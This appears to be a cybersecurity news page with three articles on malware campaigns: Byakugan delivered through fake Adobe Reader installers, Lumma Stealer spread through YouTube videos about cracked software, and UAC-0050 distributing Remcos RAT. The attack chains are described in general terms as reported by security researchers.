Apr 05, 2024NewsroomMalware / Endpoint Security

Bogus installers for Adobe Acrobat Reader are being used to distribute a new multi-functional malware dubbed Byakugan.

The starting point of the attack is a PDF file written in Portuguese that, when opened, shows a blurred image and asks the victim to click on a link to download the Reader application to view the content.

According to Fortinet FortiGuard Labs, clicking the URL leads to the delivery of an installer (“Reader_Install_Setup.exe”) that activates the infection sequence. Details of the campaign were first disclosed by the AhnLab Security Intelligence Center (ASEC) last month.

The attack chain leverages techniques like DLL hijacking and Windows User Access Control (UAC) bypass to load a malicious dynamic-link library (DLL) file named “BluetoothDiagnosticUtil.dll,” which, in turn, loads unleashes the final payload. It also deploys a legitimate installer for a PDF reader like Wondershare PDFelement.

The binary is equipped to gather and exfiltrate system metadata to a command-and-control (C2) server and drop the main module (“chrome.exe”) from a different server that also acts as its C2 for receiving files and commands.

“Byakugan is a node.js-based malware packed into its executable by pkg,” security researcher Pei Han Liao said. “In addition to the main script, there are several libraries corresponding to features.”

This includes setting up persistence, monitoring the victim’s desktop using OBS Studio, capturing screenshots, downloading cryptocurrency miners, logging keystrokes, enumerating and uploading files, and grabbing data stored in web browsers.

“There is a growing trend to use both clean and malicious components in malware, and Byakugan is no exception,” Fortinet said. “This approach increases the amount of noise generated during analysis, making accurate detections more difficult.”

The disclosure comes as ASEC revealed a new campaign that propagates the Rhadamanthys information stealer under the guise of an installer for groupware.

“The threat actor created a fake website to resemble the original website and exposed the site to the users using the ad feature in search engines,” the South Korean cybersecurity firm said. “The malware in distribution uses the indirect syscall technique to hide from the eyes of security solutions.”

It also follows a discovery that a manipulated version of Notepad++ is being employed by unidentified threat actors to propagate the WikiLoader malware (aka WailingCrab).

Jan 09, 2024NewsroomMalware / Cyber Threat

Threat actors are resorting to YouTube videos featuring content related to cracked software in order to entice users into downloading an information stealer malware called Lumma.

“These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly,” Fortinet FortiGuard Labs researcher Cara Lin said in a Monday analysis.

This is not the first time pirated software videos on YouTube have emerged as an effective bait for stealer malware. Previously similar attack chains were observed delivering stealers, clippers, and crypto miner malware.

In doing so, threat actors can leverage the compromised machines for not only information and cryptocurrency theft, but also abuse the resources for illicit mining.

In the latest attack sequence documented by Fortinet, users searching for cracked versions of legitimate video editing tools like Vegas Pro on YouTube are prompted to click on a link located in the video’s description, leading to the download of a bogus installer hosted on MediaFire.

The ZIP installer, once unpacked, features a Windows shortcut (LNK) masquerading as a setup file that downloads a .NET loader from a GitHub repository, which, in turn, loads the stealer payload, but not before performing a series of anti-virtual machine and anti-debugging checks.

Lumma Stealer, written in C and offered for sale on underground forums since late 2022, is capable of harvesting and exfiltrating sensitive data to an actor-controlled server.

The development comes as Bitdefender warned of stream-jacking attacks on YouTube in which cybercriminals take over high-profile accounts via phishing attacks that deploy the RedLine Stealer malware to siphon their credentials and session cookies, and ultimately promote various crypto scams.

It also follows the discovery of an 11-month-old AsyncRAT campaign that employs phishing lures to download an obfuscated JavaScript file that’s then utilized to drop the remote access trojan.

“The victims and their companies are carefully selected to broaden the impact of the campaign,” AT&T Alien Labs researcher Fernando Martinez said. “Some of the identified targets manage key infrastructure in the U.S.”

Jan 04, 2024NewsroomSoftware Security / Malware

The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.

“The group’s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal,” Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a Wednesday report.

“However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability.”

UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.

In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT.

Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.

The analysis from Uptycs is based on a LNK file it discovered on December 21, 2023. While the exact initial access vector is currently unknown, it’s suspected to have involved phishing emails targeting Ukrainian military personnel that claim to advertise consultancy roles with the Israel Defense Forces (IDF).

The LNK file in question collects information regarding antivirus products installed on the target computer, and then proceeds to retrieve and execute an HTML application named “6.hta” from a remote server using mshta.exe, a Windows-native binary for running HTA files.

This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called “word_update.exe” and “ofer.docx” from the domain new-tech-savvy[.]com.

Running word_update.exe causes it to create a copy of itself with the name fmTask_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.

The binary also employs unnamed pipes to facilitate the exchange of data between itself and a newly spawned child process for cmd.exe in order to ultimately decrypt and launch the Remcos RAT (version 4.9.2 Pro), which is capable of harvesting system data and cookies and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.

“Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems,” the researchers said.

“Although not entirely new, this technique marks a significant leap in the sophistication of the group’s strategies.”